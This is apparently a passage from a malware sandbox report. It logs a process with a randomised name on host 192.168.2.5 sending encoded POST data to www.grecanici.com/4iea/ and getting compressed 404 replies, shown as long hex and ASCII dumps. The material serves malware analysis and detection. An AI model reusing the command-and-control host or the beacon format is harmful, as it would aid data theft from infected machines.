May 30, 2024 15:04:19.218664885 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 30 May 2024 13:04:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED] Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;ct)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_w`'K(%s-?EOZ&H~;}}\|@Jfo\|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W\|oO 9lQR\|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti\|$uy
May 30, 2024 15:04:19.218682051 CEST	224	IN	Data Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93 Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7o
May 30, 2024 15:04:19.219213963 CEST	1236	IN	Data Raw: 53 2d f3 6b 8e fb a3 6c 37 17 67 57 93 8a 1a a7 54 b0 ce 51 04 5e 42 d5 bf 47 26 26 59 c8 c8 a5 8a 51 7b c7 ad 6a 49 60 5a 74 58 ed e5 a4 41 87 b4 46 4b 96 b3 d4 0c 0d 68 42 ef 9a 80 67 d0 30 72 81 1c 07 5e 54 c1 b0 2d 98 84 a9 31 9c cb 07 5b 6a Data Ascii: S-kl7gWTQ^BG&&YQ{jI`ZtXAFKhBg0r^T-1[jsZl?[v13(ymOTO:nh!dJ;.=\w \|(]X>*h2f5RU/)z@kHTQQs}\M!z
May 30, 2024 15:04:19.219275951 CEST	1236	IN	Data Raw: e5 8a 41 a7 55 4a 61 fd 06 12 b1 32 c1 d2 09 9c 32 c1 d5 80 4b 41 82 7d 65 93 5c ea 8e a6 9b c2 48 cd 44 d2 2b c1 1a af 4d d8 62 7e 85 58 af df 19 33 9a 52 a6 e3 da 5d 49 3c 98 ab 0b d5 43 86 c3 2c 65 1c 27 4d 8a c9 f0 f5 a4 58 db b6 fa 38 96 6d Data Ascii: AUJa22KA}e\HD+Mb~X3R]I<C,e'MX8mt4?xI.s~MM}<LA</w;Lmc<l=j,wg6z9rX1p2T*$./S$9a]){,Md^&9#UvEUsV
May 30, 2024 15:04:19.219306946 CEST	1236	IN	Data Raw: 0d 27 8f aa 23 15 5a 6b 1a ae f3 d5 4e 1e 8a e9 0a d7 1a 87 b2 ca 73 72 50 f9 54 a4 d9 4e d7 a3 81 bc 61 bf 54 67 fa b0 ac 3f 85 b9 18 a8 74 32 59 26 22 83 4c a8 c0 47 09 87 54 09 8f a8 50 7b ec a0 c3 a1 90 8e 48 51 01 81 40 20 2a 24 70 f2 28 4a Data Ascii: '#ZkNsrPTNaTg?t2Y&"LGTP{HQ@ *$p(JD(%'p<'"M"ds+Vla9A6@z2%`'}a`Pjt3DQd'$8]aQ3+8&-"uCDp
May 30, 2024 15:04:19.219324112 CEST	1236	IN	Data Raw: 81 e4 98 10 12 10 1d 40 8b 1a 10 12 10 1d 05 c5 a2 61 40 48 00 34 00 2d e9 01 ea 3b 80 cb fa 94 82 fb da 2e 68 9b 5b e1 bf 5d ae b2 9e 6e 7c fd b4 d0 9a eb 22 1c 77 29 5f 62 d7 90 4b dc 90 fd ff b6 2d 64 ca 41 3a 28 e9 1f db f5 3b aa 85 51 f3 cd Data Ascii: @a@H4-;.h[]n\|"w)_bK-dA:(;Q-pj@kBR;&]04Cu.8NIsehC[~`X,i n`X!18hG[~CkX,sR-i z,kV3ZC(4!fcBH@t-j@H
May 30, 2024 15:04:19.219341993 CEST	1236	IN	Data Raw: e4 31 20 04 0c d0 5e 90 2a 69 5f 04 50 09 24 2a 34 17 e4 09 da d7 a5 5b 71 5f 3a 47 e0 23 fb b0 af 07 c7 f3 ee f7 4d 1a 90 11 60 36 10 90 e4 31 20 05 02 02 92 3c 06 84 80 01 da 0b 52 25 ed 6b 85 3b f5 c6 a0 2c c8 1a cc a5 9b c8 ad 2c ef 8c c3 fd Data Ascii: 1 ^i_P$4[q_:G#M`61 <R%k;,,[tk9@2nP<BHhUdJ}}<5[.y>Vt>N81LaHt2H+31[g#>SFN1=SG$K(;13MbQw1H
May 30, 2024 15:04:19.219352007 CEST	1236	IN	Data Raw: 1a c8 35 02 ba 68 00 5a 74 ec 07 9b 09 d2 2b 4b 0b 0d d0 cb 4a b7 1a 48 b6 ef a2 60 fe 23 7e fd b7 c7 88 f6 cd bc 3d dc 7f f4 ed 4e d8 f7 38 fe 62 6d 87 de 6b eb b7 a1 37 6f f0 ac 73 8c e8 aa f5 a5 f4 2f 95 7b 2d fd d2 e5 e6 78 1a f4 cf 4d 82 37 Data Ascii: 5hZt+KJH`#~=N8bmk7os/{-xM7x9FtoKg'!{#:t~<_^W9fOcobQ[3m>lYg+^\|4<n=(c$00fJ1L=1L=%+F-dOJf})a0m!(S
May 30, 2024 15:04:19.219362020 CEST	776	IN	Data Raw: 19 91 12 68 7a 49 20 b2 67 42 4a 44 04 cc 68 99 90 12 81 b6 80 11 35 20 a7 14 96 93 76 80 f5 b2 67 5b 4e 10 0b 4a 7b c0 c8 1a 10 e7 a7 cc 7a ae 99 6e 29 1d 74 9c e7 b6 a2 65 a0 e1 98 61 7a 1a 4d b4 90 d6 8b 1a e8 b6 52 a7 08 98 12 2c 23 ad 86 4c Data Ascii: hzI gBJDh5 vg[NJ{zn)teazMR,#Lh\$e)ML4ah --h!y>H<^}:0kzKS#k$D"%k3h-FMh)NQSrprzq=5t<+O7emBOfkl$m
May 30, 2024 15:04:19.219372034 CEST	1236	IN	Data Raw: 4b c4 10 e2 21 24 cd 88 e9 22 84 6c ba 49 60 c9 9a 09 d3 44 44 c0 35 4a 26 4c 13 81 96 80 4b b4 01 d3 a5 30 9c b4 02 8c 97 35 db a6 83 18 50 5a 03 2e d9 76 8c 62 dc e4 d3 8d 1d 95 ae af d6 33 7d ff 9f 31 76 82 f5 2c 4c fe 43 cc 31 7c e0 fb c7 7f Data Ascii: K!$"lI`DD5J&LK05PZ.vb3}1v,LC1\|Pza=rKL<x`i*I$k9m u)f$Zl'B8%K?;9rW+W'<Nn{uq#es!=RMMbl-.qmupW
May 30, 2024 15:04:19.223807096 CEST	1236	IN	Data Raw: 04 24 38 26 a4 00 a4 d7 2b 88 e8 18 90 02 01 29 cc 64 18 90 02 29 da 50 18 49 fb 72 c6 c2 4a d0 af 17 96 8a 8e 5d e9 07 6b 41 3b 0a 23 6a 5f 7c c3 4f 0a 68 a8 f4 d4 40 d2 7e 27 31 81 b4 14 68 a8 34 92 f6 db a8 64 0a 00 29 b7 86 89 1e 42 24 88 ab Data Ascii: $8&+)d)PIrJ]kA;#j_\|Oh@~'1h4d)B$U0@J3>=+aJ/WZ'v;i!Pi$7d'xb&PtT{4C;jx)juCc{AD@)0aC60kXNL{<}(<_@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49750	35.214.235.206	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:21.152966976 CEST	717	OUT	POST /4iea/ HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.grecanici.com Referer: http://www.grecanici.com/4iea/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 47 4d 67 52 4e 34 46 33 68 6a 4f 52 7a 4e 45 79 66 50 34 63 6c 69 74 47 75 71 48 2f 46 54 41 4a 35 52 63 48 43 33 67 44 49 49 66 30 71 38 54 4b 4b 36 67 38 45 76 4f 58 37 56 68 4d 6d 79 6c 48 2f 7a 64 61 62 6e 46 30 7a 7a 57 56 66 76 75 47 61 62 5a 66 6d 6a 74 6c 36 4c 53 6e 32 6c 45 39 30 31 36 2f 6d 4e 6b 4d 46 44 6e 55 59 73 2b 64 59 74 77 48 57 44 6e 6a 46 59 39 61 55 47 62 51 32 32 65 36 34 68 6e 76 74 54 31 6f 72 4c 6c 5a 79 46 69 35 6d 64 6b 63 6e 64 6b 31 4b 4e 75 7a 62 44 71 57 53 46 58 6a 6a 52 54 59 2f 63 49 4b 7a 7a 65 63 5a 4a 68 61 39 62 75 46 4e 56 30 39 53 51 7a 41 66 63 4f 77 6e 44 4a 4a 41 31 50 37 Data Ascii: I2ID3h=GNnztYNOslY1GMgRN4F3hjORzNEyfP4clitGuqH/FTAJ5RcHC3gDIIf0q8TKK6g8EvOX7VhMmylH/zdabnF0zzWVfvuGabZfmjtl6LSn2lE9016/mNkMFDnUYs+dYtwHWDnjFY9aUGbQ22e64hnvtT1orLlZyFi5mdkcndk1KNuzbDqWSFXjjRTY/cIKzzecZJha9buFNV09SQzAfcOwnDJJA1P7
May 30, 2024 15:04:21.775486946 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 30 May 2024 13:04:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED] Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;ct)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_w`'K(%s-?EOZ&H~;}}\|@Jfo\|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W\|oO 9lQR\|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti\|$uy
May 30, 2024 15:04:21.775501966 CEST	224	IN	Data Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93 Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7o
May 30, 2024 15:04:21.775530100 CEST	1236	IN	Data Raw: 53 2d f3 6b 8e fb a3 6c 37 17 67 57 93 8a 1a a7 54 b0 ce 51 04 5e 42 d5 bf 47 26 26 59 c8 c8 a5 8a 51 7b c7 ad 6a 49 60 5a 74 58 ed e5 a4 41 87 b4 46 4b 96 b3 d4 0c 0d 68 42 ef 9a 80 67 d0 30 72 81 1c 07 5e 54 c1 b0 2d 98 84 a9 31 9c cb 07 5b 6a Data Ascii: S-kl7gWTQ^BG&&YQ{jI`ZtXAFKhBg0r^T-1[jsZl?[v13(ymOTO:nh!dJ;.=\w \|(]X>*h2f5RU/)z@kHTQQs}\M!z
May 30, 2024 15:04:21.775542021 CEST	1236	IN	Data Raw: e5 8a 41 a7 55 4a 61 fd 06 12 b1 32 c1 d2 09 9c 32 c1 d5 80 4b 41 82 7d 65 93 5c ea 8e a6 9b c2 48 cd 44 d2 2b c1 1a af 4d d8 62 7e 85 58 af df 19 33 9a 52 a6 e3 da 5d 49 3c 98 ab 0b d5 43 86 c3 2c 65 1c 27 4d 8a c9 f0 f5 a4 58 db b6 fa 38 96 6d Data Ascii: AUJa22KA}e\HD+Mb~X3R]I<C,e'MX8mt4?xI.s~MM}<LA</w;Lmc<l=j,wg6z9rX1p2T*$./S$9a]){,Md^&9#UvEUsV
May 30, 2024 15:04:21.775551081 CEST	1236	IN	Data Raw: 0d 27 8f aa 23 15 5a 6b 1a ae f3 d5 4e 1e 8a e9 0a d7 1a 87 b2 ca 73 72 50 f9 54 a4 d9 4e d7 a3 81 bc 61 bf 54 67 fa b0 ac 3f 85 b9 18 a8 74 32 59 26 22 83 4c a8 c0 47 09 87 54 09 8f a8 50 7b ec a0 c3 a1 90 8e 48 51 01 81 40 20 2a 24 70 f2 28 4a Data Ascii: '#ZkNsrPTNaTg?t2Y&"LGTP{HQ@ *$p(JD(%'p<'"M"ds+Vla9A6@z2%`'}a`Pjt3DQd'$8]aQ3+8&-"uCDp
May 30, 2024 15:04:21.775573969 CEST	1236	IN	Data Raw: 81 e4 98 10 12 10 1d 40 8b 1a 10 12 10 1d 05 c5 a2 61 40 48 00 34 00 2d e9 01 ea 3b 80 cb fa 94 82 fb da 2e 68 9b 5b e1 bf 5d ae b2 9e 6e 7c fd b4 d0 9a eb 22 1c 77 29 5f 62 d7 90 4b dc 90 fd ff b6 2d 64 ca 41 3a 28 e9 1f db f5 3b aa 85 51 f3 cd Data Ascii: @a@H4-;.h[]n\|"w)_bK-dA:(;Q-pj@kBR;&]04Cu.8NIsehC[~`X,i n`X!18hG[~CkX,sR-i z,kV3ZC(4!fcBH@t-j@H
May 30, 2024 15:04:21.775584936 CEST	1236	IN	Data Raw: e4 31 20 04 0c d0 5e 90 2a 69 5f 04 50 09 24 2a 34 17 e4 09 da d7 a5 5b 71 5f 3a 47 e0 23 fb b0 af 07 c7 f3 ee f7 4d 1a 90 11 60 36 10 90 e4 31 20 05 02 02 92 3c 06 84 80 01 da 0b 52 25 ed 6b 85 3b f5 c6 a0 2c c8 1a cc a5 9b c8 ad 2c ef 8c c3 fd Data Ascii: 1 ^i_P$4[q_:G#M`61 <R%k;,,[tk9@2nP<BHhUdJ}}<5[.y>Vt>N81LaHt2H+31[g#>SFN1=SG$K(;13MbQw1H
May 30, 2024 15:04:21.775602102 CEST	1236	IN	Data Raw: 1a c8 35 02 ba 68 00 5a 74 ec 07 9b 09 d2 2b 4b 0b 0d d0 cb 4a b7 1a 48 b6 ef a2 60 fe 23 7e fd b7 c7 88 f6 cd bc 3d dc 7f f4 ed 4e d8 f7 38 fe 62 6d 87 de 6b eb b7 a1 37 6f f0 ac 73 8c e8 aa f5 a5 f4 2f 95 7b 2d fd d2 e5 e6 78 1a f4 cf 4d 82 37 Data Ascii: 5hZt+KJH`#~=N8bmk7os/{-xM7x9FtoKg'!{#:t~<_^W9fOcobQ[3m>lYg+^\|4<n=(c$00fJ1L=1L=%+F-dOJf})a0m!(S
May 30, 2024 15:04:21.775607109 CEST	1236	IN	Data Raw: 19 91 12 68 7a 49 20 b2 67 42 4a 44 04 cc 68 99 90 12 81 b6 80 11 35 20 a7 14 96 93 76 80 f5 b2 67 5b 4e 10 0b 4a 7b c0 c8 1a 10 e7 a7 cc 7a ae 99 6e 29 1d 74 9c e7 b6 a2 65 a0 e1 98 61 7a 1a 4d b4 90 d6 8b 1a e8 b6 52 a7 08 98 12 2c 23 ad 86 4c Data Ascii: hzI gBJDh5 vg[NJ{zn)teazMR,#Lh\$e)ML4ah --h!y>H<^}:0kzKS#k$D"%k3h-FMh)NQSrprzq=5t<+O7emBOfkl$m
May 30, 2024 15:04:21.775613070 CEST	1000	IN	Data Raw: 4e 64 f4 f6 a9 21 96 29 ab 82 2e 35 2c d1 f6 ff 0a 4b 15 17 86 1c 82 03 12 d9 a2 a0 86 23 de 7a 6f 85 a2 1e 89 e3 28 6b 73 94 25 75 4c 92 80 21 96 c1 7b 2f 16 cd d5 51 b3 72 46 12 f6 d7 09 dd fa 6e 41 51 0e 07 26 53 79 c3 71 cb 94 e5 88 0a 46 2d Data Ascii: Nd!).5,K#zo(ks%uL!{/QrFnAQ&SyqF-hl\,n6'xe=&F[ts\L%PT<<}T::D_1/o-[+knEe$pn0xR`S"V3&%*a6hl\\|)y8'lzx,GJb4m
May 30, 2024 15:04:21.780493975 CEST	1236	IN	Data Raw: a3 7b 3c 7d 07 ed 28 3c 7f 17 b5 ff 5f 40 ce a0 99 ac 06 ed 28 8c a8 7d 21 11 10 90 e0 98 90 02 90 5e af 20 a2 63 40 0a 04 a4 30 93 61 40 0a a4 68 43 61 24 ed cb 19 0b 2b 41 bf 5e 58 2a 3a 76 a5 1f ac 05 ed 28 8c a8 7d 79 9e 14 3c c3 0a ed 28 3c Data Ascii: {<}(<_@(}!^ c@0a@hCa$+A^X*:v(}y<(</g/$RDtHf2Hm(}9ca%KE/<tgz+\Qxv<j_zR R E#i_XXR+`-hGaDt'6RrP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49751	35.214.235.206	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:04:23.958395958 CEST	1734	OUT	POST /4iea/ HTTP/1.1 Host: www.grecanici.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.grecanici.com Referer: http://www.grecanici.com/4iea/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 47 4e 6e 7a 74 59 4e 4f 73 6c 59 31 47 4d 67 52 4e 34 46 33 68 6a 4f 52 7a 4e 45 79 66 50 34 63 6c 69 74 47 75 71 48 2f 46 56 59 4a 35 48 6f 48 44 55 59 44 4a 49 66 30 6a 63 54 4c 4b 36 67 78 45 76 57 62 37 56 74 32 6d 77 64 48 2b 52 56 61 4b 6c 39 30 35 7a 57 56 58 50 75 44 65 62 5a 47 6d 6e 4a 66 36 4c 43 6e 32 6c 45 39 30 7a 2b 2f 68 63 6b 4d 4b 6a 6e 58 49 4d 2b 72 4a 39 77 6a 57 43 50 7a 46 59 78 73 54 32 37 51 32 57 75 36 72 6a 2f 76 76 7a 31 71 2f 72 6b 65 79 46 75 6d 6d 64 34 68 6e 64 52 69 4b 4b 43 7a 5a 6b 48 50 4a 52 50 43 68 52 4c 69 38 75 63 59 75 58 79 50 48 34 78 71 67 38 50 6a 4e 46 74 55 63 32 79 41 4b 76 6e 4d 77 47 46 43 4b 51 48 36 46 67 69 36 57 56 62 61 65 48 31 4d 33 45 49 31 51 2f 6e 6f 6d 54 4a 39 47 36 36 6c 74 66 6b 4e 61 42 6b 58 62 75 42 59 67 4e 4d 53 68 44 50 74 36 67 47 72 33 56 72 70 38 54 31 6d 34 32 62 2b 4a 79 74 36 50 78 42 4f 74 46 78 4d 4f 70 73 73 46 64 77 38 36 47 47 37 33 52 41 52 58 39 33 59 6d 48 61 63 6f 46 74 48 53 52 74 75 58 39 2f [TRUNCATED] Data Ascii: I2ID3h=GNnztYNOslY1GMgRN4F3hjORzNEyfP4clitGuqH/FVYJ5HoHDUYDJIf0jcTLK6gxEvWb7Vt2mwdH+RVaKl905zWVXPuDebZGmnJf6LCn2lE90z+/hckMKjnXIM+rJ9wjWCPzFYxsT27Q2Wu6rj/vvz1q/rkeyFummd4hndRiKKCzZkHPJRPChRLi8ucYuXyPH4xqg8PjNFtUc2yAKvnMwGFCKQH6Fgi6WVbaeH1M3EI1Q/nomTJ9G66ltfkNaBkXbuBYgNMShDPt6gGr3Vrp8T1m42b+Jyt6PxBOtFxMOpssFdw86GG73RARX93YmHacoFtHSRtuX9/PxHZXagRyOIXSf1zO3vd4IMc1f0ziAs5oczOPfvCr/ie4Z5p/4Tp7stKnpDWGyTfIX1hdztHih1Tv9lJoK3rvxUqvPU/z0gNJrsfojDTihUveoaRBh6H37LD4O0kSbBYeRD8eq485IfQ/PRROO3GzQrra6Ulmyw/Kcm/Ys30KdjB/0IQSD1XG60/RKZ4Nqo9/bvMSn4GHOeiK+CE8Bgx96f4n4n2TTn45UULwc4UAR70fBIcor+pH2bjEVh2l5wZ7fhTt89DgpshQa1PjQmMnXvf1ik/v2Up1tIqwGA9XkWjDmy1i6CmcwwbJ0gHqJD9Jqg5Pa834b58WjJ9SmGHHrKbDUGO1aPU3+orStfyQXrQ7a3S3dfWMXD9z7Rupl1Rs06R9ePzcD7g8M5ZWpA110NCnnJ7H4pMFyeDN5PRd26znetb6vriZyEOewI6UkF+vICZNWkrDeku1warfhrOjgr1HosUeUJuH3904xT4TCs5YxhdA1+4ySHW/xUkpX+HFTtrorhMw3xBDVUW1rM8t8QKPYAeRrTZvJdvgM7q3k6oCar5QCa4YBG9D2fw9nTJ5CrH+epMgU9HM3Jvn8DiA7Z0eQhzuM0aWjS1JhuvTMyeLd6wOiI0zo26DF3J0zyZoyUDI1PO+su+Vi2OaMudW6AOtUCkDe5RsW [TRUNCATED]
May 30, 2024 15:04:24.576562881 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 30 May 2024 13:04:24 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Httpd: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br Data Raw: 33 37 32 30 0d 0a 55 57 47 21 8a 8a 5e 0f cb 0e 30 5c 93 7a 00 54 06 c6 ee 80 58 b6 e3 7a be fd ef 7b 7f 7e ce 7b 32 ba 85 43 da 67 69 87 c8 ff fc 32 2d 3b 3f ec 2c 57 31 51 3d 3d 40 c2 7d 41 01 94 ab fd ff b7 69 15 92 ec 01 74 67 1d ce 2e 87 1b 6f 04 00 31 71 de be ef bf f7 7b 7e 49 76 ef 97 e1 9c 92 ba fb 9c d2 a0 3c 28 37 da 0b 55 5f 55 35 65 b5 dd 2b 43 03 c1 20 c9 83 9e 45 0c 37 c9 19 c3 60 92 70 29 c8 82 0d 17 fe ff 7f ef e7 27 2d 87 8c 8c 3e 80 86 1f 21 87 84 52 06 50 be 67 cf b9 db 4f 69 8c e7 5c ce 6a 64 9b 09 1a dd b7 54 67 8f ea 9c d5 4c 0e 19 3b 63 dc 2a e2 74 19 f0 29 6b 03 46 d9 07 f2 d7 78 ad 79 5c df ed 3f 09 8a 05 01 f1 1a bc ff cb e4 3d 57 ec 60 d5 c1 c2 2f a9 f5 a7 60 93 c2 ff de d7 f7 5b fb 78 be e4 29 0d 08 2f 36 37 45 41 32 94 f9 e6 87 d5 83 9c 60 f6 2b e5 21 f1 d6 16 72 58 5c 49 f0 2f fe f4 ed 11 7f d0 b1 b8 b2 80 88 a4 c3 b6 5e 4c 64 9a 95 ff bb 16 43 b6 4e f2 c0 10 62 82 da 38 49 c0 c0 6f bf 93 1a 84 b4 f7 c5 d9 ed e3 37 38 8c 6c db b6 fd fa 8d 1c 85 0d de 7f 8a 8b b3 cf cf [TRUNCATED] Data Ascii: 3720UWG!^0\zTXz{~{2Cgi2-;?,W1Q==@}Aitg.o1q{~Iv<(7U_U5e+C E7`p)'->!RPgOi\jdTgL;ct)kFxy\?=W`/`[x)/67EA2`+!rX\I/^LdCNb8Io78lw^2gD1bAxV:6b7/g_[zYpoo/&7uP"M_w`'K(%s-?EOZ&H~;}}\|@Jfo\|E9V9*\pV_3~79do#+7oon:@M86?Nn}=pe7YXB2Gr]9>Nw?pfcqov D{bVBH8MC2&2S\~W\|oO 9lQR\|@1azCTnkj&KS`_@,JjOhed&y:7yyiINhYU_G~6`aa/e0SAti\|$uy
May 30, 2024 15:04:24.576607943 CEST	1236	IN	Data Raw: 0e 5f 12 82 a3 d0 99 8c cf 43 95 b8 7d b8 f0 6f d9 d2 6b c4 18 5d b7 b8 32 40 26 52 58 39 69 5d c2 5f a9 d4 c1 e1 67 03 49 e6 6f 9d ad f9 b8 25 93 d9 bf c4 f1 b3 56 d6 87 6f 7f 45 69 3d 53 0a 69 8c 72 58 1e 7b 2a db 55 1b 17 f7 09 25 90 8e 3c 93 Data Ascii: _C}ok]2@&RX9i]_gIo%VoEi=SirX{*U%<RZ\PcU4>a<\$&9:R^_-Xmew}Zo:keI66X2"rcV-K3x<k7oS-kl7gWT
May 30, 2024 15:04:24.576622963 CEST	448	IN	Data Raw: cf d8 46 5c 02 d1 30 72 cb d5 bd ca f5 95 06 99 08 ec 95 2e d5 34 fe ed c5 a2 a0 52 e7 2b b3 b7 bd 6c 75 49 97 93 0f e7 12 b8 ed 51 25 31 d5 f1 91 32 60 54 52 0b f9 ce 5b d4 8e 18 25 53 b3 d6 5c b0 6c fc 35 c0 d4 31 c8 31 4c fb 5b 5e 19 c0 d4 f4 Data Ascii: F\0r.4R+luIQ%12`TR[%S\l511L[^:zl5Iu^3I-$}j4~6d;RE0`yHOL_kc`VTv3UMb4P~2QB)xQd1T#q\AUJa22
May 30, 2024 15:04:24.576653004 CEST	1236	IN	Data Raw: 5e 1d 26 39 9e c6 23 55 76 45 d3 e3 e1 90 c2 55 73 82 56 98 0a ef 97 3a f6 63 81 36 0c 2c 63 7f 35 41 2d a0 16 4e 47 aa ff c0 44 93 93 b8 08 df 11 96 c4 eb 55 32 d6 5d 97 21 5a fd 76 d9 94 ae a4 11 46 53 24 0b 22 25 f7 42 6b 91 a1 b2 e3 4d 23 9f Data Ascii: ^&9#UvEUsV:c6,c5A-NGDU2]!ZvFS$"%BkM#)1/\_I5WDB552y4&"_6-=R0Y$UK?&,tFJ~yXKLgiH58:,Xg\|J%0$yH/+
